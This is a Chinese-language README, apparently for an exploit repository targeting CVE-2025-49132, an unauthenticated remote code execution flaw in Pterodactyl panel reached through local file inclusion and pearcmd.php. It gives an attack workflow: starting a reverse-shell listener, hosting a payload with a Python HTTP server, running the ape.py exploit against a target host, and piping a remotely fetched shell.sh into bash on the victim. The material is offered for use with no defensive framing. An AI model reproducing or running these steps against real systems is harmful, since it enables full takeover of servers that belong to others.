本仓库包含针对 CVE-2025-49132 的专用利用工具,这是一个在 Pterodactyl 面板(v1.11.11 之前版本)中存在的严重未认证远程代码执行(RCE)漏洞。
该漏洞存在于 /locales/locale.json 端点。通过操纵 locale 和 namespace 查询参数,攻击者可以利用本地文件包含(LFI)与 pearcmd.php 交互。这允许创建任意文件并执行命令,从而导致系统完全被攻陷。
ape.py 脚本自动执行以下步骤:
为了在目标上实现成功的回调,请遵循以下工作流程:
penelope -p 4444
暂存服务器:如果使用自定义 shell 脚本,通过 Python 托管:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash